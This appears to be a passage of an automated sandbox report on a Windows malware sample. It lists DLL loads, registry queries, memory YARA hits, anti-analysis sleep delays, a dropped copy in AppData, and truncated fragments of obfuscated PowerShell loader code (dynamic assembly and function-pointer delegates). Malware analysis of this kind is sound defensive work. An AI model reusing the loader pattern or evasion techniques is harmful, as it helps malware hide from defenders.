      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.1836180120.00000000088FD000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000002.00000002.1837590498.000000000A812000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.2599692281.0000000004F02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Zoologists $Kokkererer91 $Basishavnen), (Lrredskjole @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Majesticalness = [AppDomain]::CurrentDomain.GetAssembl
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Pseudoanthropological)), $flintglas).DefineDynamicModule($Indexers, $false).DefineType($Ventripotent, $Pinstripe, [System.MulticastDel
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_0040610B GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0040610B
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04EAA4B0 pushfd ; ret 2_2_04EAA4B9
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_079F0FC4 push es; iretd 2_2_079F0FC7
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09360AF3 push 8BD68B50h; iretd 2_2_09360AFE
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens\yMXFgPOdf2.exeJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6504Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3103Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5160Thread sleep time: -6456360425798339s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7540Thread sleep time: -280000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_00405629 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405629
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_004060E4 FindFirstFileW,FindClose,0_2_004060E4
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\TemplatesJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: powershell.exe, 00000002.00000002.1828484729.00000000056DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\_q
      Source: powershell.exe, 00000002.00000002.1828484729.00000000056DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\_q
      Source: powershell.exe, 00000002.00000002.1828484729.00000000056DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000002.00000002.1828484729.00000000056DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\_q
      Source: powershell.exe, 00000002.00000002.1828484729.00000000056DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: msiexec.exe, 00000007.00000002.2605447393.000000000885A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2605447393.00000000088B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
